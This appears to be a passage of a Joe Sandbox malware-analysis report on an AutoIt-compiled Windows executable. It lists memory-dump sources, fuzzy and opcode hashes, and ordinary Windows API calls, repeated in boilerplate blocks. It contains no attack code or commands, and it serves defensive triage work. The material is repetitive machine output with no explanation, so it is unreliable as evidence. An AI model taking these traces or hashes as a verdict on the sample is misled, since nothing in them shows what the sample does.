          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
          • String ID: \*.*
          • API String ID: 2326526234-1173974218
          • Opcode ID: 322d4ce287e1a8f2a6e52071bb92f16256fa7a4d8468bb46a048e30ba44bc434
          • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
          • Opcode Fuzzy Hash: 322d4ce287e1a8f2a6e52071bb92f16256fa7a4d8468bb46a048e30ba44bc434
          • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
          APIs
            • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
          • _wcslen.LIBCMT ref: 004335F2
          • GetFileAttributesW.KERNEL32(?), ref: 0043361C
          • GetLastError.KERNEL32 ref: 0043362B
          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
          • _wcsrchr.LIBCMT ref: 00433666
            • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
          • String ID: \
          • API String ID: 321622961-2967466578
          • Opcode ID: 526c1cfc3a43b05f59396125bad82ada4ca6822ef6053a482ff07b87bd9873bd
          • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
          • Opcode Fuzzy Hash: 526c1cfc3a43b05f59396125bad82ada4ca6822ef6053a482ff07b87bd9873bd
          • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __wcsnicmp
          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
          • API String ID: 1038674560-2734436370
          • Opcode ID: efa81754a5abe8513f160bb6911180a265eadee6fd6379dbf0aa142365742102
          • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
          • Opcode Fuzzy Hash: efa81754a5abe8513f160bb6911180a265eadee6fd6379dbf0aa142365742102
          • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
          APIs
          • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
          • LoadStringW.USER32(00000000), ref: 00434060
          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
          • LoadStringW.USER32(00000000), ref: 00434078
          • _wprintf.LIBCMT ref: 004340A1
          • MessageBoxW.USER32 ref: 004340B9
          Strings
          • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: HandleLoadModuleString$Message_wprintf
          • String ID: %s (%d) : ==> %s: %s %s
          • API String ID: 3648134473-3128320259
          • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
          • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
          • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
          • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
          APIs
          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
          • __lock.LIBCMT ref: 00417981
            • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
            • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
            • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
          • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
          • __lock.LIBCMT ref: 004179A2
          • ___addlocaleref.LIBCMT ref: 004179C0
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
          • String ID: KERNEL32.DLL$pI
          • API String ID: 637971194-197072765
          • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
          • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
          • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
          • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _memmove$_malloc
          • String ID:
          • API String ID: 1938898002-0
          • Opcode ID: 2ce468dc38d926dca984c11268d9471146ccb36140ddbc17ece8c7536f167c26
          • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
          • Opcode Fuzzy Hash: 2ce468dc38d926dca984c11268d9471146ccb36140ddbc17ece8c7536f167c26
          • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
          APIs
            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
          • SendMessageW.USER32(750A0E13,00001001,00000000,?), ref: 00448E16
          • SendMessageW.USER32(750A0E13,00001026,00000000,?), ref: 00448E25
            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$BrushCreateDeleteObjectSolid
          • String ID:
          • API String ID: 3771399671-0
          • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
          • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
          • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
          • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
          APIs
          • GetWindowLongW.USER32(?,000000EC), ref: 00455F6E
          • SendMessageW.USER32 ref: 00455FA9
          • SendMessageW.USER32(?,0000104B,00000000,?), ref: 00455FE0
          • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00456046
          • _wcslen.LIBCMT ref: 0045604D
          • _wcslen.LIBCMT ref: 0045606B
          • CharNextW.USER32(00000000), ref: 00456087
          • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 004560B0
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$_wcslen$CharLongNextWindow
          • String ID:
          • API String ID: 159606182-0
          • Opcode ID: effcb5322ba4eec5805bdc9ff3e87fd9ad748b5a824b860898149c767b872444
          • Instruction ID: 3bbf8a548e7eb208f054a6dd8501fd8283818e16530c2b92652a98a135d3fd27
          • Opcode Fuzzy Hash: effcb5322ba4eec5805bdc9ff3e87fd9ad748b5a824b860898149c767b872444
          • Instruction Fuzzy Hash: 6B411A71A0020A9BDB10DFA8DC85BEEB7B4FF48325F00862EEA14E72C0D7759414CB94
          APIs
          • SysAllocString.OLEAUT32(00000000), ref: 00434EE8
          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F0B
          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F37
          • SysAllocString.OLEAUT32(00000000), ref: 00434F3E
          • SysAllocString.OLEAUT32(?), ref: 00434F64
          • SysFreeString.OLEAUT32(?), ref: 00434F6D
          • StringFromGUID2.OLE32(?,?,00000028), ref: 00434FA8
          • SysAllocString.OLEAUT32(?), ref: 00434FB6
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
          • String ID:
          • API String ID: 3761583154-0
          • Opcode ID: c5d21507e6e3eccb23303eb15914a403a0a48f361310b5348ce2244b0762a054
          • Instruction ID: 62a2b3f98caf240b0b87dceec1cde1b3ad41479520e9ab1bd59fe61f77259947
          • Opcode Fuzzy Hash: c5d21507e6e3eccb23303eb15914a403a0a48f361310b5348ce2244b0762a054
          • Instruction Fuzzy Hash: A631A5327001186BC710AB99EC49FEFB7A8EB8C731F14427BFA09D7290DA759844C7A4
          APIs
          • DeleteObject.GDI32(?), ref: 00440F24
          • GetDC.USER32(00000000), ref: 00440F2C
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00440F38
          • ReleaseDC.USER32(00000000,?), ref: 00440F46
          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 00440F90
          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00440FA7
          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00440FDD
          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00440FFF
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
          • String ID:
          • API String ID: 3864802216-0
          • Opcode ID: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
          • Instruction ID: d9fc15c341c8c83caa3938f749aa41814f3de42eaf1e3e6405ddac876be99683
          • Opcode Fuzzy Hash: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
          • Instruction Fuzzy Hash: F13164B16402147FEB14CF54DC89FAB3799EB98B15F048169FE08DE2C5D6B9E840CB64
          APIs
          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
          • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
          • _memmove.LIBCMT ref: 0044B555
          • _memmove.LIBCMT ref: 0044B578
          • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
          • String ID:
          • API String ID: 2737351978-0
          • Opcode ID: 77967d9e85ebc0d1809f9d21310e36f211de5249dbc67eb9c4135a799c2082f5
          • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
          • Opcode Fuzzy Hash: 77967d9e85ebc0d1809f9d21310e36f211de5249dbc67eb9c4135a799c2082f5
          • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
          APIs
          • ___set_flsgetvalue.LIBCMT ref: 0041523A
          • __calloc_crt.LIBCMT ref: 00415246
          • __getptd.LIBCMT ref: 00415253
          • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
          • _free.LIBCMT ref: 0041529E
          • __dosmaperr.LIBCMT ref: 004152A9
            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
          • String ID:
          • API String ID: 3638380555-0
          • Opcode ID: 1e3549e1b40c46e1e2bdeb1dac8f7558b0702ee900a73ae1ed32e84986d40efa
          • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
          • Opcode Fuzzy Hash: 1e3549e1b40c46e1e2bdeb1dac8f7558b0702ee900a73ae1ed32e84986d40efa
          • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
          APIs
          • VariantInit.OLEAUT32(?), ref: 0046C96E
            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Variant$Copy$ClearErrorInitLast
          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
          • API String ID: 3207048006-625585964
          • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
          • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
          • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
          • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
          APIs
          • WSAStartup.WSOCK32(00000101,?), ref: 00465559
            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
          • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
          • gethostbyname.WSOCK32(?), ref: 004655A6
          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
          • _memmove.LIBCMT ref: 004656CA
          • GlobalFree.KERNEL32(00000000), ref: 0046575C
          • WSACleanup.WSOCK32 ref: 00465762
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
          • String ID:
          • API String ID: 2945290962-0
          • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
          • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
          • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
          • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
          APIs
          • GetSystemMetrics.USER32 ref: 00440527
          • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000), ref: 00440763
          • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
          • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
          • ShowWindow.USER32(?,00000000), ref: 004407FD
          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
          • String ID:
          • API String ID: 1457242333-0
          • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
          • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
          • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
          • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
          APIs
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
